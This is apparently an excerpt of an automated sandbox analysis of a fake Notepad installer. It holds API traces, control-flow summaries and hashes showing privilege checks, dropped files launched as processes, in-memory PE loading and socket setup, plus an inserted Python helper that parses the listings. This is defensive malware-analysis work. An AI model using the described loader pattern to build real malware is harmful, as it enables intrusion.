                                      0x00409342
                                      0x00409344
                                      0x00409348
                                      0x0040934b
                                      0x0040934f
                                      0x00409494
                                      0x00409499
                                      0x0040949c
                                      0x0040949f
                                      0x004094a3
                                      0x004094a7
                                      0x004094aa
                                      0x004094af
                                      0x004094b4
                                      0x004094b7
                                      0x004094ba
                                      0x004094bc
                                      0x00409573
                                      0x00409576
                                      0x00000000
                                      0x004094c2
                                      0x004094c2
                                      0x004094c4
                                      0x00000000
                                      0x004094ca
                                      0x004094ca
                                      0x004094d1
                                      0x004094d4
                                      0x00000000
                                      0x004094d4
                                      0x004094c4
                                      0x00000000
                                      0x004094bc
                                      0x00409355
                                      0x00409358
                                      0x0040935b
                                      0x0040935f
                                      0x00409363
                                      0x00409365
                                      0x00409368
                                      0x00409370
                                      0x00409381
                                      0x00409386
                                      0x00409389
                                      0x0040938b
                                      0x0040938f
                                      0x00409392
                                      0x004093ac
                                      0x004093ac
                                      0x004093ac
                                      0x004093af
                                      0x004093b4
                                      0x00000000
                                      0x00000000
                                      0x004093a0
                                      0x004093a3
                                      0x004093a5
                                      0x004093a8
                                      0x004093aa
                                      0x00000000
                                      0x00000000
                                      0x004093c7
                                      0x004093c7
                                      0x004093ca
                                      0x004093cd
                                      0x004093d2
                                      0x004093d4
                                      0x004093d8
                                      0x00409616
                                      0x004093de
                                      0x004093ee
                                      0x004093f5
                                      0x004094dd
                                      0x004094e0
                                      0x004094e2
                                      0x004095e7
                                      0x004095ee
                                      0x004095f3
                                      0x004095f6
                                      0x004095f8
                                      0x004095fe
                                      0x00409601
                                      0x00409604
                                      0x0040960b
                                      0x0040960b
                                      0x004094e8
                                      0x004094eb
                                      0x004094f3
                                      0x00409516
                                      0x00409516
                                      0x00409519
                                      0x0040951c
                                      0x00409520
                                      0x00409522
                                      0x00409500
                                      0x00409524
                                      0x00409524
                                      0x00409524
                                      0x00409505
                                      0x00409507
                                      0x0040950a
                                      0x0040950c
                                      0x0040950e
                                      0x0040950e
                                      0x00409510
                                      0x00409512
                                      0x00000000
                                      0x00000000
                                      0x00409514
                                      0x00409514
                                      0x0040952b
                                      0x0040952e
                                      0x00409531
                                      0x00409538
                                      0x0040953d
                                      0x00409540
                                      0x00409542
                                      0x00409548
                                      0x0040954b
                                      0x00409552
                                      0x00409558
                                      0x0040955a
                                      0x0040957d
                                      0x0040955c
                                      0x0040955c
                                      0x0040955c
                                      0x0040955a
                                      0x00409542
                                      0x004093fb
                                      0x00409400
                                      0x00409569
                                      0x00409569
                                      0x00409400
                                      0x004093f5
                                      0x00409406
                                      0x00000000
                                      0x00409406
                                      0x004093b6
                                      0x004093ba
                                      0x004093bd
                                      0x004093c0
                                      0x004093c5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004093c5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040930a
                                      0x00409438
                                      0x0040943b
                                      0x00409443
                                      0x00409445
                                      0x00409451
                                      0x00409451
                                      0x00409445
                                      0x004092b9
                                      0x00000000
                                      0x0040928f
                                      0x0040928f
                                      0x00409291
                                      0x00409294
                                      0x00409297
                                      0x0040929c
                                      0x0040929e
                                      0x0040929e
                                      0x0040948d
                                      0x00409490
                                      0x00409490
                                      0x00409241
                                      0x00408ecf
                                      0x00408ebb
                                      0x0040947d
                                      0x0040947d
                                      0x00409480
                                      0x0040905b
                                      0x00409065
                                      0x00409065
                                      0x00408e98
                                      0x00408e09
                                      0x00408e01
                                      0x00000000

                                      APIs
                                      • strlen.MSVCRT ref: 00408DB4
                                      • memcpy.MSVCRT ref: 00408DDB
                                        • Part of subcall function 00409790: setlocale.MSVCRT ref: 004097A8
                                        • Part of subcall function 00409790: _strdup.MSVCRT ref: 004097B6
                                        • Part of subcall function 00409790: setlocale.MSVCRT ref: 004097CC
                                        • Part of subcall function 00409790: wcstombs.MSVCRT ref: 004097F7
                                        • Part of subcall function 00409790: wcstombs.MSVCRT ref: 00409824
                                        • Part of subcall function 00409790: setlocale.MSVCRT ref: 00409834
                                        • Part of subcall function 00408D40: malloc.MSVCRT ref: 00408D57
                                      • strlen.MSVCRT ref: 00408E25
                                      • _strdup.MSVCRT ref: 00408E72
                                      • strlen.MSVCRT ref: 00408EF0
                                      • strlen.MSVCRT ref: 004092CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: strlen$setlocale$_strdupwcstombs$mallocmemcpy
                                      • String ID: @$\${
                                      • API String ID: 3109254050-3793226235
                                      • Opcode ID: d94793a96d8ef9b7f1c3237bf5d260d39e48d9d5f13d987d82fa3dae0cb6d214
                                      • Instruction ID: 7abe499393f3cf874450ccc27ba7372533db9edf66c7a69db6a133c8b261ef6e
                                      • Opcode Fuzzy Hash: d94793a96d8ef9b7f1c3237bf5d260d39e48d9d5f13d987d82fa3dae0cb6d214
                                      • Instruction Fuzzy Hash: 4A32A071D082558BDB10DF69C4402AEBBB2AF45304F18857FD895BB382DB39AC46CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 398 6e2cda-6e2d3b VirtualFree memset time srand calloc 400 6e2dfb 398->400 401 6e2d41-6e2d65 call 6e64be strlen call 6e8013 398->401 403 6e2dfe-6e2e0a 400->403 413 6e2de6-6e2df9 call 6e64d1 ??3@YAXPAX@Z 401->413 414 6e2d67-6e2de3 call 6ef51e call 6ef885 call 6ef8f0 call 6ef5ba 401->414 405 6e2e0c-6e2e14 403->405 406 6e2e17-6e2e22 ??3@YAXPAX@Z 403->406 405->406 408 6e3598-6e359c 406->408 409 6e2e28-6e2e40 GetCurrentProcess OpenProcessToken 406->409 411 6e2e9d-6e2ea4 call 6e359d 409->411 412 6e2e42-6e2e75 memset call 6e415d 409->412 425 6e2eaa-6e2ebc call 6e35f2 411->425 426 6e2f98-6e2fb1 call 6ec89b call 6e403a 411->426 423 6e2e77-6e2e8b lstrcmpiW 412->423 424 6e2e94-6e2e97 CloseHandle 412->424 413->403 414->413 423->424 430 6e2e8d 423->430 424->411 434 6e358e-6e3597 ??3@YAXPAX@Z 425->434 435 6e2ec2-6e2ed5 calloc 425->435 426->434 444 6e2fb7-6e2fd9 call 6e64be call 6e2975 426->444 430->424 434->408 435->434 438 6e2edb-6e2f6a memcpy * 3 strlen 435->438 441 6e2f6c 438->441 442 6e2f70-6e2f93 ??3@YAXPAX@Z 438->442 441->442 450 6e358d 442->450 452 6e2fdf-6e3002 call 6e3f27 CreateFileMappingW 444->452 453 6e357a-6e358c call 6e64d1 ??3@YAXPAX@Z 444->453 450->434 458 6e356a GetLastError 452->458 459 6e3008-6e3023 call 6e6512 MapViewOfFile 452->459 453->450 460 6e3570-6e3579 ??3@YAXPAX@Z 458->460 463 6e3559 GetLastError 459->463 464 6e3029-6e309f strlen memcpy * 3 strcpy 459->464 460->453 465 6e355f-6e3568 CloseHandle 463->465 466 6e30a5-6e316d UnmapViewOfFile call 6e5c88 * 8 lstrcpyW call 6e651b * 2 464->466 467 6e30a1 464->467 465->460 488 6e3173-6e31bb call 6e651b call 6e57d5 call 6e2975 466->488 467->466 488->465 495 6e31c1-6e31eb call 6e651b * 2 488->495 500 6e3381-6e33b3 GetTickCount _snwprintf ExpandEnvironmentStringsW 495->500 501 6e31f1-6e3223 GetTickCount _snwprintf ExpandEnvironmentStringsW 495->501 502 6e354d-6e3557 ??3@YAXPAX@Z 500->502 504 6e33b9-6e33d3 CreateFileW 500->504 501->502 503 6e3229-6e3243 CreateFileW 501->503 502->465 503->502 506 6e3249-6e3270 WriteFile CloseHandle 503->506 504->502 505 6e33d9-6e3400 WriteFile FindCloseChangeNotification 504->505 505->502 507 6e3406-6e3409 505->507 506->502 508 6e3276-6e3279 506->508 507->502 509 6e340f-6e3440 _snwprintf call 6e3d9d 507->509 508->502 510 6e327f-6e32b0 _snwprintf call 6e3d9d 508->510 509->502 516 6e3446-6e345f GetModuleHandleA 509->516 510->502 515 6e32b6-6e32cf GetModuleHandleA 510->515 517 6e32de-6e32e4 515->517 518 6e32d1-6e32d9 GetProcAddress 515->518 519 6e346e-6e3474 516->519 520 6e3461-6e3469 GetProcAddress 516->520 521 6e32e6-6e32ee GetProcAddress 517->521 522 6e32f3-6e32fa 517->522 518->517 523 6e3476-6e347e GetProcAddress 519->523 524 6e3483-6e348a 519->524 520->519 521->522 525 6e32fc-6e32ff 522->525 526 6e3302-6e3317 ExpandEnvironmentStringsW 522->526 523->524 527 6e348c-6e348f 524->527 528 6e3492-6e34a8 ExpandEnvironmentStringsW 524->528 525->526 529 6e336c-6e3373 526->529 530 6e3319-6e334c GetStartupInfoW CreateProcessW 526->530 527->528 531 6e34ae-6e34b1 528->531 532 6e353f-6e3546 528->532 529->502 534 6e3379-6e337c 529->534 530->529 533 6e334e-6e336a WaitForSingleObject CloseHandle * 2 530->533 535 6e34ee-6e351f GetStartupInfoW CreateProcessW 531->535 536 6e34b3-6e34c6 CoInitialize call 6e3f5f 531->536 532->502 537 6e3548 532->537 533->529 539 6e354b 534->539 535->532 538 6e3521-6e353d WaitForSingleObject CloseHandle * 2 535->538 542 6e34cf call 6e6f32 536->542 543 6e34c8-6e34cd call 6e6977 536->543 537->539 538->532 539->502 547 6e34d4-6e34d9 542->547 543->547 548 6e34db-6e34e0 Sleep 547->548 549 6e34e6-6e34ec 547->549 548->549 549->532
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$memcpystrlen$Processcallocmemset$CloseCurrentFreeHandleOpenTokenVirtuallstrcmpisrandtime
                                      • String ID: SYSTEM
                                      • API String ID: 3425465250-968218125
                                      • Opcode ID: 0a5a699f310945c0ba7151edf3f05612b4bfeddb60dce53af764b146ab9fa3d4
                                      • Instruction ID: d0b8d50f48c6db4b7d80cc49f6bebf240cf04ce866aaaa4e7d6fa6f57ecbff9b
                                      • Opcode Fuzzy Hash: 0a5a699f310945c0ba7151edf3f05612b4bfeddb60dce53af764b146ab9fa3d4
                                      • Instruction Fuzzy Hash: 7D812BB1901359AFDB50DFA5DC89ADEBBFAFB08304F10456AE549E7250DB30A944CF20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      Control-flow graph: rendered image not reproduced here. Function starting at 402609; its blocks call HeapAlloc, LoadLibraryW, strlen, FreeLibrary and HeapFree.
                                      APIs
                                      • HeapAlloc.KERNEL32 ref: 0040263B
                                      • LoadLibraryW.KERNEL32 ref: 0040270D
                                      • strlen.MSVCRT ref: 004027CC
                                      • FreeLibrary.KERNEL32 ref: 0040284C
                                      • HeapFree.KERNEL32 ref: 00402866
                                        • Part of subcall function 0040240C: TlsAlloc.KERNEL32 ref: 00402414
                                        • Part of subcall function 0040240C: TlsSetValue.KERNEL32 ref: 00402424
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: AllocFreeHeapLibrary$LoadValuestrlen
                                      • String ID: .$MemF$Rust Analyzer 02$a$b$c$d$e$i$l$l$n$t
                                      • API String ID: 2201604028-3158050648
                                      • Opcode ID: 3bdcccb426339d1b263f279166384a14830091d0bb5e60991591b28352ae3406
                                      • Instruction ID: 5c54ac9a3e98a9018d135860533fe7f04dae54dfa988f81fe7b9af442e591fc5
                                      • Opcode Fuzzy Hash: 3bdcccb426339d1b263f279166384a14830091d0bb5e60991591b28352ae3406
                                      • Instruction Fuzzy Hash: 82B1E1B5608341CBC720DF15C58876BBBE0BF84704F14892EE99897391D7B9D988CB9B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      Control-flow graph: rendered image not reproduced here. Function starting at 409790; its blocks call setlocale, _strdup, wcstombs and mbstowcs.
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: setlocale$wcstombs$_strdup
                                      • String ID:
                                      • API String ID: 3699089627-0
                                      • Opcode ID: eff2bffd89970c0ed27fce27b869c07652d780bacb0a294859c313edf4fa8c6d
                                      • Instruction ID: 1d60297118ab8596b41b029e74c87b7ac82eb2bc180e13b623edd6e3ab22f0d2
                                      • Opcode Fuzzy Hash: eff2bffd89970c0ed27fce27b869c07652d780bacb0a294859c313edf4fa8c6d
                                      • Instruction Fuzzy Hash: 1BA15D70A042158ACB24AF69C04467BF7F1FF44344F44843FE889A7392E7389C96DB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003), ref: 006EF50E
                                        • Part of subcall function 006F1C63: GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,006EF519), ref: 006F1C71
                                        • Part of subcall function 006F1C63: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 006F1C81
                                        • Part of subcall function 006F1C63: GetProcAddress.KERNEL32(00000000,NtDeviceIoControlFile), ref: 006F1C8E
                                        • Part of subcall function 006F1C63: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,006EF519), ref: 006F1C9A
                                        • Part of subcall function 006F1C63: GetProcAddress.KERNEL32(00000000,SetFileCompletionNotificationModes), ref: 006F1CA4
                                        • Part of subcall function 006F1C63: GetProcAddress.KERNEL32(00000000,CancelIoEx), ref: 006F1CB1
                                      • WSAStartup.WS2_32(00000202,?), ref: 006F1863
                                        • Part of subcall function 006F160C: memset.NTDLL ref: 006F161C
                                        • Part of subcall function 006F160C: htons.WS2_32(00000002), ref: 006F162D
                                        • Part of subcall function 006F160C: inet_addr.WS2_32(?), ref: 006F163A
                                        • Part of subcall function 006F1653: memset.NTDLL ref: 006F1663
                                        • Part of subcall function 006F1653: htons.WS2_32(?), ref: 006F1674
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 006F18B0
                                      • getsockopt.WS2_32(00000000,0000FFFF,00002005,?,?), ref: 006F18E1
                                      • closesocket.WS2_32(00000000), ref: 006F18F4
                                      • WSAGetLastError.WS2_32 ref: 006F18FC
                                      • socket.WS2_32(00000017,00000001,00000000), ref: 006F1911
                                      • getsockopt.WS2_32(00000000,0000FFFF,00002005,?,?), ref: 006F1937
                                      • closesocket.WS2_32(00000000), ref: 006F1946
                                      • WSAGetLastError.WS2_32 ref: 006F194E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Error$HandleLastModuleclosesocketgetsockopthtonsmemsetsocket$ModeStartupinet_addr
                                      • String ID: 0.0.0.0
                                      • API String ID: 2896273404-3771769585
                                      • Opcode ID: 30d8fd51a0aa0bbacc6e8b293d6dc601838ae0d681274f1a0c15ed1a7e6a8546
                                      • Instruction ID: 2fe2aae8b861e27ea6291ab5d6123a784cf425f5a17de77828e1379a617495f8
                                      • Opcode Fuzzy Hash: 30d8fd51a0aa0bbacc6e8b293d6dc601838ae0d681274f1a0c15ed1a7e6a8546
                                      • Instruction Fuzzy Hash: 6431C872104309EBE310AF64DC8EFBB77AEEF46790F11151AF7149A1D0D7B459098BA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      Control-flow graph: rendered image not reproduced here. Function starting at 6e8da7; its blocks call ExpandEnvironmentStringsW, CreateFileW, GetFileSize, malloc, ReadFile, VirtualAlloc, memcpy and FindCloseChangeNotification.
                                      APIs
                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 006E8DC6
                                      • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006E8DE7
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 006E8DFE
                                      • malloc.MSVCRT ref: 006E8E08
                                      • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 006E8E23
                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006E8E57
                                      • memcpy.NTDLL(00000000,00000000,00000000), ref: 006E8E69
                                      • memcpy.NTDLL(?,?,?), ref: 006E8E8F
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006E8EA7
                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 006E8EB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$memcpy$??3@AllocChangeCloseCreateEnvironmentExpandFindNotificationReadSizeStringsVirtualmalloc
                                      • String ID: MZ
                                      • API String ID: 31580269-2410715997
                                      • Opcode ID: fbfbec48a0aebb477316b0fa0ca4cfd0358660889269f1bf4643a444d98266b6
                                      • Instruction ID: bcb29e6ac26ce8aff19a40f5ec99788b97d32ce305b7f6ffa14591cb4f3cb127
                                      • Opcode Fuzzy Hash: fbfbec48a0aebb477316b0fa0ca4cfd0358660889269f1bf4643a444d98266b6
                                      • Instruction Fuzzy Hash: EA318F71901315EFCB209FA5DC88EEEBBBAEF44754F144159F905A3291EB70DA80CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%
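The function listings in this report give every argument as raw hexadecimal, so reading them means decoding the constants by hand (0x80000000 in CreateFileW is GENERIC_READ, 0x2005 at level 0xFFFF in getsockopt is SO_PROTOCOL_INFOW, and so on). The Python below is an added triage helper written for this page, not Joe Sandbox code and not code recovered from the sample: it parses the "Api.MODULE(args), ref: addr" lines into records, decodes the constants that recur in this report, and flags the open-read-allocate-copy shape of the listing at 006E8DA7. The sample lines are copied from this report's own listings; the constant tables cover only the APIs shown here, and the loader heuristic is this example's own rule, not one the report states.

```python
"""Parse the "Api.MODULE(args), ref: addr" lines of a Joe Sandbox function listing
into records and decode the Win32/Winsock constants that recur in this report.
Added triage helper written for this page (not Joe Sandbox code, not from the
sample); SAMPLE is copied from the 006E8DA7, 006F1C63 and Winsock listings above
and the loader heuristic is this example's own."""
import re
from dataclasses import dataclass
from typing import List, Optional

LINE_RE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class Call:
    name: str
    module: str
    ref: int
    args: list                        # int for hex values, str for literals, None for "?"
    subcall_of: Optional[int] = None  # set on "Part of subcall function" lines

def _arg(tok: str):
    tok = tok.strip().split("(")[0]   # drop the tool's own label, e.g. 00000001(TokenUser)
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok) else tok

def parse_line(line: str) -> Optional[Call]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw, sub = m.group("args"), m.group("sub")
    args = [_arg(t) for t in raw.split(",")] if raw and raw.strip() else []
    return Call(m.group("name"), m.group("mod"), int(m.group("ref"), 16),
                args, int(sub, 16) if sub else None)

def parse_listing(text: str) -> List[Call]:
    return [c for c in map(parse_line, text.splitlines()) if c]

# (api, argument index) -> bit-flag names (FLAGS) or exact-value names (ENUMS)
FLAGS = {
    ("CreateFileW", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
    ("CreateFileW", 2): {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"},
    ("VirtualAlloc", 2): {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"},
    ("SetErrorMode", 0): {1: "SEM_FAILCRITICALERRORS", 2: "SEM_NOGPFAULTERRORBOX",
                          0x8000: "SEM_NOOPENFILEERRORBOX"},
}
ENUMS = {
    ("CreateFileW", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                         4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"},
    ("VirtualAlloc", 3): {2: "PAGE_READONLY", 4: "PAGE_READWRITE",
                          0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"},
    ("socket", 0): {2: "AF_INET", 23: "AF_INET6"},
    ("socket", 1): {1: "SOCK_STREAM", 2: "SOCK_DGRAM"},
    ("getsockopt", 1): {0xFFFF: "SOL_SOCKET"},
    ("getsockopt", 2): {0x2004: "SO_PROTOCOL_INFOA", 0x2005: "SO_PROTOCOL_INFOW"},
    ("GetTokenInformation", 1): {1: "TokenUser", 25: "TokenIntegrityLevel"},
}

def decode_arg(call: Call, idx: int) -> str:
    v = call.args[idx]
    if v is None or isinstance(v, str):
        return "?" if v is None else repr(v)
    key = (call.name, idx)
    if key in ENUMS and v in ENUMS[key]:
        return ENUMS[key][v]
    if key in FLAGS:
        names = [n for bit, n in FLAGS[key].items() if v & bit]
        rest = v & ~sum(FLAGS[key])           # bits the table does not know stay hex
        return "|".join(names + ([hex(rest)] if rest else [])) or "0"
    return hex(v)

def describe(call: Call) -> str:
    args = ", ".join(decode_arg(call, i) for i in range(len(call.args)))
    return f"{call.ref:08X}  {call.name}.{call.module}({args})"

def flags_in_memory_loader(calls: List[Call]) -> bool:
    """Heuristic: the function itself (subcalls excluded) opens a file, reads it,
    allocates fresh memory and copies into it, in that order (the 006E8DA7 shape)."""
    order = [c.name for c in calls if c.subcall_of is None]
    pos = 0
    for want in ("CreateFileW", "ReadFile", "VirtualAlloc", "memcpy"):
        if want not in order[pos:]:
            return False
        pos = order.index(want, pos) + 1
    return True

SAMPLE = """\
• ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 006E8DC6
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006E8DE7
• ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 006E8E23
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006E8E57
• memcpy.NTDLL(?,?,?), ref: 006E8E8F
• ??3@YAXPAX@Z.MSVCRT ref: 006E8EA7
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 006E8EB1
  • Part of subcall function 006F1C63: GetProcAddress.KERNEL32(00000000,CancelIoEx), ref: 006F1CB1
• SetErrorMode.KERNELBASE(00008003), ref: 006EF50E
• socket.WS2_32(00000017,00000001,00000000), ref: 006F1911
• getsockopt.WS2_32(00000000,0000FFFF,00002005,?,?), ref: 006F1937
"""
```

parse_listing() takes the pasted text of one function's APIs section; for an (api, index) pair that is not in the tables decode_arg() falls back to hex, so unknown calls are still printed by describe() rather than dropped, and the tables are meant to be extended with the argument positions of whatever the next listing uses. The getsockopt option names assume level SOL_SOCKET, which is the only level this report shows.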

                                      Control-flow Graph

                                      Control-flow graph: rendered image not reproduced here. Function starting at 402b64; its blocks call HeapCreate, HeapAlloc, HeapDestroy, CreateEventW, HeapFree and WaitForSingleObject.
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: Heap$AllocCreateFree$CountDestroyEventObjectSingleTickWait
                                      • String ID: @
                                      • API String ID: 446487923-2766056989
                                      • Opcode ID: f2fd1b130b011ee09a56d032911334bef911c14d7685bfa24acd2a3946c586bf
                                      • Instruction ID: 6691df7879b12dcc9e18df826808d4b8e14686723d60f8a7926321b977bb69e4
                                      • Opcode Fuzzy Hash: f2fd1b130b011ee09a56d032911334bef911c14d7685bfa24acd2a3946c586bf
                                      • Instruction Fuzzy Hash: B871E9B0404705DFDB50AF25C28831BBBE0BF44348F11896EE8885B396D7B9D958CF8A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      Control-flow graph: rendered image not reproduced here. Function starting at 6f0d4a; its blocks call memset, CreateEventA, WSASend, GetLastError, WSAGetLastError and RegisterWaitForSingleObject.
                                      APIs
                                      • memset.NTDLL ref: 006F0D71
                                      • memset.NTDLL ref: 006F0D7D
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006F0D8F
                                      • WSASend.WS2_32(?,?,?,?,00000000,?,00000000), ref: 006F0DB4
                                      • GetLastError.KERNEL32 ref: 006F0E0D
                                      • WSAGetLastError.WS2_32 ref: 006F0E1A
                                      • RegisterWaitForSingleObject.KERNEL32(?,?,006F0EDF,?,000000FF,0000000C), ref: 006F0EA6
                                      • GetLastError.KERNEL32 ref: 006F0EB6
                                      • GetLastError.KERNEL32 ref: 006F0EBC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$memset$CreateEventObjectRegisterSendSingleWait
                                      • String ID:
                                      • API String ID: 2117649443-0
                                      • Opcode ID: 939761fe82958f257e0061a352ac1b6447336c07c2883ef9c38ca961fc56b337
                                      • Instruction ID: b668e6a59af22763505c9104e5712a71be7075845005b3eea18adc72a8797c7e
                                      • Opcode Fuzzy Hash: 939761fe82958f257e0061a352ac1b6447336c07c2883ef9c38ca961fc56b337
                                      • Instruction Fuzzy Hash: 42517571500B0AAFE724CF65C980AA6BBFAFF08354B008A1DE95587A62D730F955CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNEL32(?,?,00000001,?,?,?,?,006E88E3,?,?), ref: 006E8F2D
                                      • GetCurrentProcess.KERNEL32(?,?,?,?,006E88E3,?,?), ref: 006E8F42
